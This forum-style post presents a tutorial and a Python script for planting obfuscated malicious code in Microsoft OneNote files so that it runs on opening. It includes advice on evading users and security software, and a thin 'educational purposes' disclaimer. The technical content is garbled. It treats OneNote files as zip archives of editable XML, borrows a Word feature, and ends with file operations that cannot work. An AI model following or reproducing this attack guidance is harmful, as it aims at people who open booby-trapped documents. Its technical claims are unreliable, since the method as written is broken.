Код:
Introduction:
In this article, we delve into the intriguing realm of CustomXMLParts in Microsoft OneNote files. We explore an innovative approach to embedding malicious code within CustomXMLParts, aiming for unauthorized code execution upon opening the OneNote file. Please note that this writeup is for educational purposes only, and any misuse or unethical behavior is strongly discouraged.
Section 1: Understanding CustomXMLParts
To comprehend the exploitation technique, we must first understand what CustomXMLParts are. CustomXMLParts are sections within OneNote files that allow users to store custom XML data. They offer great flexibility and can be manipulated to execute arbitrary code.
Section 2: Crafting the Malicious Script
To successfully exploit CustomXMLParts, we need to create a malicious script cleverly concealed within the OneNote file. We choose a scripting language like JavaScript or VBScript to develop the code, making sure it targets known or undisclosed vulnerabilities in OneNote or related applications. Obfuscation techniques such as variable renaming, string encryption, or Base64 encoding can be used to hide the script's true intentions.
Section 3: Manipulating the OneNote File Structure
In this section, we manipulate the structure of the OneNote file to ensure our malicious code is executed upon opening. The following steps outline this process:
Step 1: Extracting the OneNote File
Using a library like `zipfile`, we extract the contents of the OneNote file, revealing its internal structure.
Step 2: Creating the CustomXMLPart
We create a CustomXMLPart and embed our obfuscated malicious code within it. Careful consideration should be given to make the code appear innocuous and evade detection by unsuspecting users or security software.
Step 3: Modifying the OneNote File
Locate the relevant .one or .onetoc2 files within the extracted contents and modify them to reference the CustomXMLPart containing the malicious code. This step ensures that the script is executed when the OneNote file is opened.
Step 4: Saving the Modified OneNote File
Save the modified OneNote file, preserving the original file structure, using the `zipfile` library. This ensures that the changes made to the file structure are retained.
Section 4: Implementing the Python Script
To automate the process described above, we present an advanced Python script. This script utilizes libraries like `zipfile` and `xml.etree.ElementTree` to manipulate the OneNote file and CustomXMLParts. It automates the extraction, modification, and embedding of the malicious script, enabling quick execution of the technique.
Conclusion:
The exploitation of CustomXMLParts in Microsoft OneNote files opens up a world of possibilities for executing code within a seemingly innocent document. By following the steps outlined in this article, one can embed a concealed malicious script and manipulate the OneNote file structure to achieve unauthorized code execution. However, it is crucial to remember that this information is purely for educational purposes. Responsible and ethical use of technology is paramount, and any misuse can have severe consequences.
Python:
import os
import zipfile
import xml.etree.ElementTree as ET
onenote_path = "path/to/onenote/file.onepkg"
xml_schema_path = "path/to/customXML/schema.xsd"
malicious_code = "print('Hello xss!')"
modified_file_path = "path/to/save/modified/onenote/file.onepkg"
with zipfile.ZipFile(onenote_path, "r") as onenote_zip:
onenote_zip.extractall("temp/")
customxml_data = f"""<?xml version="1.0"?>
<?mso-application progid="OneNote.FilenameTemplate"?>
<myXML xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/office/onenote/2013/onenote">
<script>
<![CDATA[
{malicious_code}
]]>
</script>
</myXML>
"""
root = ET.fromstring(customxml_data)
ns = {'xmlns': 'http://schemas.microsoft.com/office/onenote/2013/onenote'}
ns_map = {None: 'http://schemas.microsoft.com/office/onenote/2013/onenote'}
root.set('schema', xml_schema_path)
xml_data = ET.tostring(root, encoding='UTF-8', method='xml')
for foldername, subfolders, filenames in os.walk("temp/"):
for filename in filenames:
if filename.endswith(".one") or filename.endswith(".onetoc2"):
filepath = os.path.join(foldername, filename)
with open(filepath, "r", encoding="UTF-8") as f:
filedata = f.read()
filedata = filedata.replace('</one:Page>', f'<one:InsertedFile path="file:///temp/customxml.xml" /></one:Page>')
with open(filepath, "w", encoding="UTF-8") as f:
f.write(filedata)
with zipfile.ZipFile(modified_file_path, "w") as modified_zip:
for foldername, subfolders, filenames in os.walk("temp/"):
for filename in filenames:
filepath = os.path.join(foldername, filename)
modified_zip.write(filepath, arcname=filepath.replace("temp/", ""))
modified_zip.writestr("temp/customxml.xml", xml_data)
os.remove(onenote_path)
os.rename(modified_file_path, onenote_path)
os.rename("temp/", modified_file_path)
Последнее редактирование: